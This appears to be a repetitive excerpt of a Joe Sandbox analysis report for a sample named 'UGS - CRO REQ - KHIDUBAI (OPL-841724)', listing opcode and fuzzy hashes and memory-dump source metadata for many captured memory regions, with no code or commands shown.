                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fdb6ddbc98d7afc98deed00077cc0cfc660de6da996e69049f540167473a93ba
                                                                                                                                                    • Instruction ID: 24b1acb11dd9c1bd06025d888b932d70413505bd54a634d1d686b16bcdd33349
                                                                                                                                                    • Opcode Fuzzy Hash: fdb6ddbc98d7afc98deed00077cc0cfc660de6da996e69049f540167473a93ba
                                                                                                                                                    • Instruction Fuzzy Hash: 9EF0DA74A422188FD7A4DF24D995BD977B1FB18701F1051DAD80997394DB36EE818F00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3956b07276dc2a590e04d02aa43426ec6be449a6391bcbaa9b679b3a5eac8643
                                                                                                                                                    • Instruction ID: 08bebec7b441c9fae06b82ec60ae5037fc97b8e67ddab6c789f90474e0ad0f01
                                                                                                                                                    • Opcode Fuzzy Hash: 3956b07276dc2a590e04d02aa43426ec6be449a6391bcbaa9b679b3a5eac8643
                                                                                                                                                    • Instruction Fuzzy Hash: E3E02635704B866FC713573D992005E3BE24FC22203414A19C0C18358DEE24E8034716
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bd93641e6d33df8eb933f4683de979016bc03c1305402254da08b17ff3489d1c
                                                                                                                                                    • Instruction ID: 792bf8373d58ed75c247b4646c8e3cae5f0b72833c47ebad98a8b1844da45b3a
                                                                                                                                                    • Opcode Fuzzy Hash: bd93641e6d33df8eb933f4683de979016bc03c1305402254da08b17ff3489d1c
                                                                                                                                                    • Instruction Fuzzy Hash: 92D02B32B002156B8B0493FC74001AE77F88FC51B43104226D61DC22D0E932CC018390
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 625968d28ef3148a1c33bc4c95f550e559bf9486f4e9a86d8e16032c8cc78f66
                                                                                                                                                    • Instruction ID: fbc533005bc02da2bad629db70bd5120244bde4f1ccec085e0bd6a8a413a8942
                                                                                                                                                    • Opcode Fuzzy Hash: 625968d28ef3148a1c33bc4c95f550e559bf9486f4e9a86d8e16032c8cc78f66
                                                                                                                                                    • Instruction Fuzzy Hash: 02E01A34904208EFCB00DF98D94499CBBB8FB49311F148195E84517361D631AEA0DF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b66edc2b0aa11a84a2bfe8575d30ec4c4274101c098aa6947ca9dec6d95e3f02
                                                                                                                                                    • Instruction ID: 2ad9c308d7b1d227cbb18712c7ff6417ebd320c4eff679cb7c1080e432d53b96
                                                                                                                                                    • Opcode Fuzzy Hash: b66edc2b0aa11a84a2bfe8575d30ec4c4274101c098aa6947ca9dec6d95e3f02
                                                                                                                                                    • Instruction Fuzzy Hash: 7BE04F70E05308EFDB04EFA8D5446ACBBB9EB48304F1481E9C848A3340E7356A51DF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4ec39555cdd75dc4b8ea37c359c1814344a062f8d7d4143bed3f30b50ac3b7f9
                                                                                                                                                    • Instruction ID: f56bbc6b4ab7a0773f8f95abee2e3ca3da92befb468d894a803e3aa8a3676b96
                                                                                                                                                    • Opcode Fuzzy Hash: 4ec39555cdd75dc4b8ea37c359c1814344a062f8d7d4143bed3f30b50ac3b7f9
                                                                                                                                                    • Instruction Fuzzy Hash: 72E04F74908208EFC704DF98E951A6DBF7DBB59301F1481D9DC4597381C6329A41DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ecac5f4698e1c22ab829fc2fd8ba0315df6ddf34631788e008ad9c6d9b9236df
                                                                                                                                                    • Instruction ID: 81768dd992596d1bc25193aee6aede9e14da0053f391b7a85a69f844de109687
                                                                                                                                                    • Opcode Fuzzy Hash: ecac5f4698e1c22ab829fc2fd8ba0315df6ddf34631788e008ad9c6d9b9236df
                                                                                                                                                    • Instruction Fuzzy Hash: 50E01A34D04208EBC704DF98E5556ACBBB8EB8C304F1481EACC5857381C6315A45CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 629891063dc8914a89467fd4a29b1128bf8b3e2a49efa6f1cea4a8b6ac81bd42
                                                                                                                                                    • Instruction ID: 30764e1eafb468caf5c3512938fe26bb0be688ea1c424183f1c59fb61a5a18aa
                                                                                                                                                    • Opcode Fuzzy Hash: 629891063dc8914a89467fd4a29b1128bf8b3e2a49efa6f1cea4a8b6ac81bd42
                                                                                                                                                    • Instruction Fuzzy Hash: E1E08634904208EBC704DF98E94596CBF78EB89300F20C199DC4817354D6325A51DB80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7ec9aa8e2e6e09992130af810f5f34f03668f6414de957ce81056cf5d9b57160
                                                                                                                                                    • Instruction ID: df4c302c9c9d30a4cbb602d846d79b0ba036823cefdb936cc200f7f1a436584b
                                                                                                                                                    • Opcode Fuzzy Hash: 7ec9aa8e2e6e09992130af810f5f34f03668f6414de957ce81056cf5d9b57160
                                                                                                                                                    • Instruction Fuzzy Hash: 14E0C230809108EFC704DFA8E981ABDBFBCAB4A301F1081E9D80423380DA301E51DBA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9c9ed8490eba583a4473250ba6c0a9831bc7e795a99b5379df090938e55c54c3
                                                                                                                                                    • Instruction ID: 26e1c1c059931c25a2b48632c05f60b0c75ef4ff6c33b3b45873cf242bec56bb
                                                                                                                                                    • Opcode Fuzzy Hash: 9c9ed8490eba583a4473250ba6c0a9831bc7e795a99b5379df090938e55c54c3
                                                                                                                                                    • Instruction Fuzzy Hash: D5E0E674905208DFC744DFACD65569CFBF8EB49305F1441E9C808D7341E631AE56CB41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 127e6329298f50e980830a667ced19f5b5eba5fa9785a6522a389a3b6e440ae5
                                                                                                                                                    • Instruction ID: 38712bbddc9a9dba45678a9c132755a8b524a1476679d86339177b2011c72d5d
                                                                                                                                                    • Opcode Fuzzy Hash: 127e6329298f50e980830a667ced19f5b5eba5fa9785a6522a389a3b6e440ae5
                                                                                                                                                    • Instruction Fuzzy Hash: B0E04F71E01308AFEB54DFB8E9016AD77F5EB85320F104B59D41597284EA714E01AB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7e435cc90e8fd908d0e1b8060ccfb24e4262048203df31b576feaa0869c30c81
                                                                                                                                                    • Instruction ID: e6f5a797d239b31dc65919f76687eb54938cd3926fbcf6133ce83006dd416c96
                                                                                                                                                    • Opcode Fuzzy Hash: 7e435cc90e8fd908d0e1b8060ccfb24e4262048203df31b576feaa0869c30c81
                                                                                                                                                    • Instruction Fuzzy Hash: 82E04F71E06248DFC785DFB8E90069C7BB0DF49205B5049EAD444D7255E6305F099B40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 828c785edc7f8d202c9287908c7d7e7e7ebe1060004d2e2c8beee3f8d676ee2f
                                                                                                                                                    • Instruction ID: 7f166cb836341b51259755ca73ac2f26bfd07c84c41ef97ce8b2c4dd8235a3a9
                                                                                                                                                    • Opcode Fuzzy Hash: 828c785edc7f8d202c9287908c7d7e7e7ebe1060004d2e2c8beee3f8d676ee2f
                                                                                                                                                    • Instruction Fuzzy Hash: 95E0E534D08208ABC704DFA8E5516BCBFB8EB88204F1481EED84997385CA359E42CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: aef4476b411122acdd3af5eac9e0fd82c9688770d86afc0b139527d1bdb5436f
                                                                                                                                                    • Instruction ID: faf2adb3ca7791b19df15667256a1c5ef89a3824b1134a67a421cd8735308309
                                                                                                                                                    • Opcode Fuzzy Hash: aef4476b411122acdd3af5eac9e0fd82c9688770d86afc0b139527d1bdb5436f
                                                                                                                                                    • Instruction Fuzzy Hash: C8E0B630905208DBC745EFA8D55529CBBB9EB09305F5415A9C94896240E6315A84CB41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 75d8a26d68c6835df09897d095e02cc361b3e071b34c44f96ffdd0da348c396f
                                                                                                                                                    • Instruction ID: 270e52cab85846cf514ca2787b27807e5424268555a8f055ee19c63eded725e2
                                                                                                                                                    • Opcode Fuzzy Hash: 75d8a26d68c6835df09897d095e02cc361b3e071b34c44f96ffdd0da348c396f
                                                                                                                                                    • Instruction Fuzzy Hash: DCE0C231802208DBD700FFBDD810B4E7FA8DB04308F0044FAD50493260DE315A0497A6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction ID: 9f01113cce538188e0ec8a1bedc87ecd86300c3a48006ec4165e1877226274bb
                                                                                                                                                    • Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction Fuzzy Hash: C0E01234909208DBC704DF98E9555ADBF78EB89305F14D1DDCD081B381CA325E42CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction ID: 10da5560f4cef563701c096e75371fc3b55d7392fa3e517b99961765b32cb0ea
                                                                                                                                                    • Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction Fuzzy Hash: 74E0EC74909208DBC708DF98EA559ACBB78EB89305F2491DDCD0927381CA319A42CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction ID: 12ba66e6e3905970f6aad0b505db5e9e573169027381232b7290cc864ba7e34e
                                                                                                                                                    • Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction Fuzzy Hash: D8E01234909208DBD704DF98E9559ACBF79EB8D305F1491DDCD0917381DA329E52CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction ID: 1265324ab0bf3ea7dad9c7a4873be4308bfa38eb4c55910a0363598fe2e62716
                                                                                                                                                    • Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction Fuzzy Hash: 5CE01234909208DBC704EF98E9555ACBF7CEB89305F1491EDCD0C1B381CA315E42CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction ID: a8bbaed9ed6c122b21b967e26102e9038c26c63224fa81b45c60c14c62acac60
                                                                                                                                                    • Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction Fuzzy Hash: 65E0C234908208DBC704DF98E9816ACBF78EB89318F2091DDDC481B381CA325E42CB80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3ac1ec672629e9d25ea2bdec1c0deb8b3b674620eb1842d56186acc8d1ef4c78
                                                                                                                                                    • Instruction ID: 9a1e1005761fcf388c1224ed6f5afbd401ea9b44591cf5625b4b5a8865f2e5a1
                                                                                                                                                    • Opcode Fuzzy Hash: 3ac1ec672629e9d25ea2bdec1c0deb8b3b674620eb1842d56186acc8d1ef4c78
                                                                                                                                                    • Instruction Fuzzy Hash: 73E01234909144DFD758CBA8E951BACBF789B4D208F1451DDC94957392DA324D42CB01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction ID: 9e203545b8a6a919a3bfd451e75feb90218b033a9e07a531c63169764c344663
                                                                                                                                                    • Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction Fuzzy Hash: 30E01234909208DBD708DF98E9555ACBF7CEB89305F2491DDDD0857381CB325E82DB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction ID: aaf887794b791ad3120e6eda345cd848f0cccc760ce41afcedbf15f87f224809
                                                                                                                                                    • Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction Fuzzy Hash: 88E0123490920CDFC704DF98E9559ACBF79EB89305F1492DDDD0867381CA315E82CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction ID: 232878c6dcc967440aa451c2616ce035f46d7ebc2cc43de385217e1a883eb27f
                                                                                                                                                    • Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction Fuzzy Hash: 7EE01234909208DBC704DF98E9559ACBF78EB89305F2491EDCD0817385CA319E42CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction ID: 819622bc3ce4726f0e40827e0b0f20f548ff89dba035a002558b4a9a3a44536c
                                                                                                                                                    • Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
                                                                                                                                                    • Instruction Fuzzy Hash: BBE0EC38909208DBC704DF98E9556ACBBB8EB8A319F2491DDED4817381CB316A46CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8e4ed462fe8f95e8356b99f83eb21abf8e158ba21791d9d199370be5657d3018
                                                                                                                                                    • Instruction ID: d1a1f4671da5d11e10c42f4e5ff4ca04ee4e62a43b8051e9511abd31c0b61766
                                                                                                                                                    • Opcode Fuzzy Hash: 8e4ed462fe8f95e8356b99f83eb21abf8e158ba21791d9d199370be5657d3018
                                                                                                                                                    • Instruction Fuzzy Hash: 46E08630D04208DBCF08CF98E5515ACBF74EB8A314F2081DDC80417384C6324E41DF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0bec5528128390ae9ae85fd8975a99605cdfb82d43bf044cecb441d0b170006d
                                                                                                                                                    • Instruction ID: f7f3be1f916812f32ed0581d5954c20aca54f61eb75951e06f027a3107271736
                                                                                                                                                    • Opcode Fuzzy Hash: 0bec5528128390ae9ae85fd8975a99605cdfb82d43bf044cecb441d0b170006d
                                                                                                                                                    • Instruction Fuzzy Hash: ABE01234909308DBD704DF98E95556DBF78FB89315F2491D9D80817385CB325E46CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
